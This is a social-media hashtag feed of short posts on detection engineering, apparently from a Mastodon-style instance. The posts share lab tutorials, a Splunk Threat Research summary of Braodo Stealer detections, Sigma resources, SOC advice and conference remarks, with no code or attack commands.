Recent searches
Search options
Administered by:
#detectionengineering
How to create detection engineering lab:
- Part 1:
https://medium.com/@bastradamus/how-to-create-a-detection-engineering-lab-part-1-8dacc52001b5
- Part 2:
https://medium.com/@bastradamus/how-to-create-a-detection-engineering-lab-part-2-3bdbb2c873d6
Applying Test-Driven Development to Detection Engineering: https://medium.com/@matterpreter/applying-test-driven-development-to-detection-engineering-b2e1d91a6563
Information Stealer malware remains one of the most active and dangerous threats in the wild. In this blog, #Splunk Threat Research Team #STRT, dive into Braodo Stealer, a Python-based malware designed to steal sensitive information while leveraging a popular developer platform to distribute its payload. We’ve analyzed its techniques, tactics, and procedures (TTPs) and shared the detection strategies we developed to combat this threat. Additionally, we took a closer look at its batch script loader, which employs layered obfuscation to complicate analysis and reverse engineering. To counter this, we created a custom Python de-obfuscation tool, which we detail in this post. #reverseengineering #blueteam #detectionengineering #incidentresponse #splunk #malwareanalysis . 
de-obfuscator tool:
https://lnkd.in/du2n7Gh8
Braodo Stealer Blog:
https://lnkd.in/d6bZ5AAX
Mapping my threat model onto the SIEM logs. Which ones are directly useful, which ones can be used for correlation?
You can hazard a good guess from the source types and index names. Next job is to validate assumptions with SOC.
If you wanted to help someone go zero to hero as a detection engineer what resources would you recommend?
Have you been keeping up with your low confidence detections? - https://detect.fyi/have-you-been-keeping-up-with-your-low-confidence-detections-494c742202e4
I'm back, but less newbish (I think). Still no mentor though 
. Still interested in #dfir and looking to pivot towards
#detectionengineering .
Coming soon: short article of my opinion on how to write clean KQL for Analytic Rules.
an awesome overview of all the LOL and GTFO stuff. Even some are well known it's a good overview.
#detectionengineering enables collaborative outsourcing. Not all internal or all outsourced is the sweet spot.
Visibility (metrics) without actionability is a waste of time.
Concept or “Detection Surface”
Make sure that detection, investigation, response are iterative (with a #detectionengineering cycle) and break the silo between the content team and and the investigators/analysts
Framing #detectionengineering as way to introduce #secop into Agile Development. to address team and talent challenge
1) Build a system to develop emerging practioners (mitigate vendors stealing your talent to avoid L1 analyst stagnation
https://www.linkedin.com/in/hackerxbella/ is kicking off the conference!
Might be about #detectionengineering but we'll see 
#mitre
Next up here at #hacklu2024 is Thomas Patzke talking about 8 years of #SIGMA development.
SigmaHQ Essentials: Building Robust Detection Capabilities
- Part 1: https://blog.reconinfosec.com/sigmahq-essentials-building-robust-detection-capabilities
- Part 2: https://blog.reconinfosec.com/sigmahq-essentials_-building-robust-detection-capabilities-part-2
PSA: if you are doing anything SOC, and you haven’t listened to #DCPthepodcast, you’re missing out.
I am not sure you can do SOC stuff right without listening to this podcast….